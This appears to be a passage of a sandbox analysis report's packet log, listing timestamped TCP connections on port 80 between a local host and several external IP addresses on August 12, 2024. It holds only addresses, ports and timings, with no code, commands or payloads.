Aug 12, 2024 05:14:45.314516068 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:45.314542055 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:45.314588070 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:45.314614058 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:45.314639091 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:46.413259029 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:46.413491011 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:46.413561106 CEST	49750	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:46.811965942 CEST	49750	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:47.830020905 CEST	49751	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:47.835953951 CEST	80	49751	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:47.837692976 CEST	49751	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:47.839350939 CEST	49751	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:47.845561028 CEST	80	49751	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:48.710083961 CEST	80	49751	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:48.710107088 CEST	80	49751	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:48.710218906 CEST	49751	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:48.712660074 CEST	49751	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:48.717509031 CEST	80	49751	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:53.805129051 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:53.810091972 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:53.813884020 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:53.818006992 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:53.822923899 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:54.455980062 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:54.456032038 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:54.456065893 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:54.456108093 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:54.456140995 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:54.456176043 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:54.456190109 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:54.456190109 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:54.456207991 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:54.456222057 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:54.456250906 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:55.327753067 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:56.349347115 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:56.354357004 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:56.359544992 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:56.359544992 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:56.364479065 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:56.999478102 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:56.999519110 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:56.999552011 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:56.999583006 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:56.999618053 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:56.999619961 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:56.999620914 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:56.999649048 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:56.999711990 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:57.874667883 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:58.892971039 CEST	49754	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:58.898636103 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.898781061 CEST	49754	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:58.900903940 CEST	49754	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:58.906589031 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.906651020 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.906666994 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.907195091 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.907211065 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.907972097 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.907987118 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.908014059 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:58.908030033 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:59.550528049 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:59.550597906 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:59.550648928 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:59.550678968 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:59.550715923 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:59.550719023 CEST	49754	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:59.550749063 CEST	80	49754	194.9.94.85	192.168.2.4
Aug 12, 2024 05:14:59.550793886 CEST	49754	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:14:59.551125050 CEST	49754	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:00.405844927 CEST	49754	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:01.424613953 CEST	49755	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:01.429716110 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:01.429991007 CEST	49755	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:01.431474924 CEST	49755	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:01.436420918 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:02.090054989 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:02.090114117 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:02.090151072 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:02.090183020 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:02.090220928 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:02.090253115 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:02.090377092 CEST	49755	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:02.090378046 CEST	49755	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:02.090807915 CEST	49755	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:02.093236923 CEST	49755	80	192.168.2.4	194.9.94.85
Aug 12, 2024 05:15:02.098108053 CEST	80	49755	194.9.94.85	192.168.2.4
Aug 12, 2024 05:15:07.681262016 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:07.687453032 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:07.687695980 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:07.689435959 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:07.696104050 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:09.208802938 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:09.255970955 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:10.221438885 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:10.226543903 CEST	80	49757	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:10.229866028 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:10.233745098 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:10.238708973 CEST	80	49757	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:11.733973026 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:11.779934883 CEST	80	49757	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.753360987 CEST	49758	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:12.758639097 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.758848906 CEST	49758	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:12.761729956 CEST	49758	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:12.766907930 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.766938925 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.766966105 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.766992092 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.767038107 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.767062902 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.767087936 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.767136097 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:12.767162085 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:14.267045021 CEST	49758	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:14.320100069 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:15.283740044 CEST	49759	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:15.289207935 CEST	80	49759	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:15.289469957 CEST	49759	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:15.291173935 CEST	49759	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:15.296170950 CEST	80	49759	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:29.051358938 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:29.051618099 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:31.581362963 CEST	80	49757	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:31.581701994 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:34.128271103 CEST	80	49758	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:34.129122972 CEST	49758	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:36.645334959 CEST	80	49759	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:36.645488024 CEST	49759	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:36.646553993 CEST	49759	80	192.168.2.4	23.251.54.212
Aug 12, 2024 05:15:36.651364088 CEST	80	49759	23.251.54.212	192.168.2.4
Aug 12, 2024 05:15:41.688713074 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:41.693753004 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:41.695040941 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:41.698921919 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:41.704111099 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288678885 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288707972 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288733959 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288765907 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288783073 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288799047 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288815022 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288830042 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288849115 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288862944 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.288964987 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:42.288964987 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:42.288964987 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:42.288964987 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:42.289117098 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:42.294327974 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.294352055 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.294369936 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.294385910 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.294455051 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:42.294836044 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:42.375583887 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.375608921 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.375638008 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:42.375827074 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:42.375951052 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:43.202734947 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.220462084 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.225764036 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.226994991 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.230930090 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.236071110 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.838941097 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.838992119 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839025974 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839054108 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.839060068 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839095116 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839128017 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839147091 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.839160919 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839174986 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.839194059 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839226007 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839251995 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.839258909 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.839310884 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.850224972 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.850272894 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.850311041 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.850322962 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.890058994 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.929835081 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.929883957 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.929929972 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:44.929940939 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:44.929975033 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:45.735038996 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:46.752644062 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:46.758099079 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.758330107 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:46.760613918 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:46.765949965 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.765994072 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.766021967 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.766048908 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.766076088 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.766103029 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.766129017 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.766181946 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:46.766207933 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365048885 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365142107 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365179062 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365212917 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365212917 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:47.365266085 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365282059 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:47.365299940 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365333080 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365339041 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:47.365364075 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365401030 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365416050 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:47.365431070 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.365478039 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:47.371001959 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.371051073 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.371087074 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.371114016 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:47.371123075 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.371172905 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:47.452121019 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.452167988 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.452208042 CEST	80	49762	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:47.452336073 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:47.452336073 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:48.265089989 CEST	49762	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.284821987 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.290003061 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.290082932 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.292229891 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.297113895 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902158976 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902220964 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902256012 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902288914 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902322054 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902354002 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902386904 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902419090 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902452946 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902471066 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.902487993 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.902534962 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.906903982 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.907728910 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.907777071 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.907813072 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.914911985 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.989573956 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.989618063 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.989651918 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.989684105 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:49.989717007 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.989835024 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:49.994548082 CEST	49763	80	192.168.2.4	199.192.19.19
Aug 12, 2024 05:15:50.003320932 CEST	80	49763	199.192.19.19	192.168.2.4
Aug 12, 2024 05:15:55.410208941 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:55.415937901 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:55.416008949 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:55.417943954 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:55.422768116 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:56.156547070 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:56.156574011 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:56.156593084 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:56.156882048 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:56.161098003 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:56.161117077 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:56.161318064 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:56.921300888 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:57.942910910 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:57.949618101 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:57.949774027 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:57.952933073 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:57.959429026 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:58.646765947 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:58.646795988 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:58.646817923 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:58.646857023 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:58.650124073 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:58.650185108 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:58.650186062 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 12, 2024 05:15:58.650255919 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:15:59.468348026 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:00.487013102 CEST	49766	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:00.492330074 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.497010946 CEST	49766	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:00.497010946 CEST	49766	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:00.502870083 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.502902985 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.502929926 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.502958059 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.502989054 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.504018068 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.504045963 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.504074097 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:00.504101038 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:01.197101116 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:01.197151899 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:01.197191000 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:01.197323084 CEST	49766	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:01.200086117 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:01.200146914 CEST	49766	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:01.200176954 CEST	80	49766	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:01.200232029 CEST	49766	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:01.999418974 CEST	49766	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:03.018084049 CEST	49767	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:03.023339987 CEST	80	49767	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:03.023411036 CEST	49767	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:03.025938988 CEST	49767	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:03.030813932 CEST	80	49767	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:04.076773882 CEST	80	49767	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:04.076831102 CEST	80	49767	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:04.076870918 CEST	80	49767	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:04.076894999 CEST	49767	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:04.079963923 CEST	80	49767	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:04.080020905 CEST	80	49767	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:04.080166101 CEST	49767	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:04.082824945 CEST	49767	80	192.168.2.4	213.145.228.16
Aug 12, 2024 05:16:04.087729931 CEST	80	49767	213.145.228.16	192.168.2.4
Aug 12, 2024 05:16:09.135797977 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:09.140774012 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:09.140851021 CEST	49768	80	192.168.2.4	91.195.240.19
